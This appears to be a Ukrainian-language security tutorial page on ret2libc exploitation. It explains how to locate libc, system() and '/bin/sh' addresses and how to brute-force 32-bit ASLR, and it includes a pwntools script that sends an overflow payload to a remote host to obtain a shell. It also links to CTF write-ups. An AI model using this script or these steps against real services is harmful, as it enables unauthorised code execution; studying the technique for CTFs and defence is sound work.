Ret2lib

Основна інформація

Суть Ret2Libc полягає в перенаправленні потоку виконання вразливої програми на функцію в загальній бібліотеці (наприклад, system, execve, strcpy) замість виконання shellcode, наданого атакуючим, в стеку. Атакуючий створює payload, який модифікує адресу повернення в стеці, щоб вказати на потрібну функцію бібліотеки, одночасно забезпечуючи правильну настройку будь-яких необхідних аргументів відповідно до конвенції виклику.

Приклад кроків (спрощено)

• Отримати адресу функції для виклику (наприклад, system) та команду для виклику (наприклад, /bin/sh)

• Згенерувати ROP-ланцюг для передачі першого аргументу, що вказує на рядок команди, та потоку виконання до функції

Знаходження адрес

• Припустимо, що libc, яка використовується, є тією, що з поточної машини, ви можете знайти, де вона буде завантажена в пам'ять за допомогою:

ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)

Якщо ви хочете перевірити, чи змінює ASLR адресу libc, ви можете зробити:

for i in `seq 0 20`; do ldd ./<bin> | grep libc; done

• Знаючи використовувану libc, також можливо знайти зсув до функції system за допомогою:

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system

• Знаючи використовувану libc, також можливо знайти зсув до рядка /bin/sh функції за допомогою:

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

Використання gdb-peda / GEF

Знаючи використовувану libc, також можливо використовувати Peda або GEF для отримання адреси функції system, функції exit та рядка /bin/sh :

p system
p exit
find "/bin/sh"

Використання /proc/<PID>/maps

Якщо процес створює дочірні процеси щоразу, коли ви з ним спілкуєтеся (мережевий сервер), спробуйте прочитати цей файл (можливо, вам знадобиться бути root).

Тут ви можете знайти точно, де завантажено libc всередині процесу і де воно буде завантажено для кожного дочірнього процесу.

У цьому випадку воно завантажено в 0xb75dc000 (Це буде базова адреса libc)

Невідома libc

Можливо, ви не знаєте, яку libc завантажує бінарник (оскільки вона може бути розташована на сервері, до якого у вас немає доступу). У такому випадку ви можете зловживати вразливістю, щоб витягнути деякі адреси та дізнатися, яка бібліотека libc використовується:

І ви можете знайти шаблон pwntools для цього в:

Визначення libc з 2 зсувами

Перевірте сторінку https://libc.blukat.me/ і використовуйте декілька адрес функцій всередині libc, щоб дізнатися використовувану версію.

Обхід ASLR на 32 бітах

Ці атаки методом перебору є корисними лише для 32-бітних систем.

• Якщо експлойт локальний, ви можете спробувати методом перебору знайти базову адресу libc (корисно для 32-бітних систем):

for off in range(0xb7000000, 0xb8000000, 0x1000):

• Якщо ви атакуєте віддалений сервер, ви можете спробувати вгадати адресу функції usleep з libc, передаючи в якості аргументу 10 (наприклад). Якщо в якийсь момент сервер відповідає на 10 секунд пізніше, ви знайшли адресу цієї функції.

One Gadget

Виконайте оболонку, просто стрибнувши на одну конкретну адресу в libc:

x86 Ret2lib Code Example

У цьому прикладі брутфорс ASLR інтегровано в код, а вразливий бінарний файл розташований на віддаленому сервері:

from pwn import *

c = remote('192.168.85.181',20002)
c.recvline()

for off in range(0xb7000000, 0xb8000000, 0x1000):
p = ""
p += p32(off + 0x0003cb20) #system
p += "CCCC" #GARBAGE, could be address of exit()
p += p32(off + 0x001388da) #/bin/sh
payload = 'A'*0x20010 + p
c.send(payload)
c.interactive()

x64 Ret2lib Code Example

Перевірте приклад з:

ARM64 Ret2lib Example

У випадку ARM64, інструкція ret переходить до того, на що вказує реєстр x30, а не до того, на що вказує стековий реєстр. Тому це трохи складніше.

Також в ARM64 інструкція виконує те, що вона робить (неможливо перейти в середині інструкцій і перетворити їх на нові).

Перевірте приклад з:

Ret-into-printf (or puts)

Це дозволяє витікати інформацію з процесу шляхом виклику printf/puts з деякими специфічними даними, розміщеними як аргумент. Наприклад, якщо помістити адресу puts в GOT у виконання puts, це викриє адресу puts в пам'яті.

Ret2printf

Це в основному означає зловживання Ret2lib, щоб перетворити його на вразливість форматних рядків printf за допомогою ret2lib, щоб викликати printf з значеннями для експлуатації (звучить безглуздо, але можливо):

Other Examples & references

• https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html

• Ret2lib, наданий витік адреси функції в libc, використовуючи один гаджет

• https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html

• 64 біти, ASLR увімкнено, але без PIE, перший крок - заповнити переповнення до байта 0x00 канарки, щоб потім викликати puts і витікати його. З канаркою створюється ROP гаджет для виклику puts, щоб витікати адресу puts з GOT, а потім ROP гаджет для виклику system('/bin/sh')

• https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html

• 64 біти, ASLR увімкнено, без канарки, переповнення стека в main з дочірньої функції. ROP гаджет для виклику puts, щоб витікати адресу puts з GOT, а потім виклик одного гаджета.

• https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html

• 64 біти, без pie, без канарки, без relro, nx. Використовує функцію write, щоб витікати адресу write (libc) і викликає один гаджет.

• https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html

• Використовує форматний рядок, щоб витікати канарку зі стека і переповнення буфера, щоб викликати system (вона в GOT) з адресою /bin/sh.

• https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html

• 32 біти, без relro, без канарки, nx, pie. Зловживає поганим індексуванням, щоб витікати адреси libc і heap зі стека. Зловживає переповненням буфера, щоб зробити ret2lib, викликаючи system('/bin/sh') (адреса heap потрібна для обходу перевірки).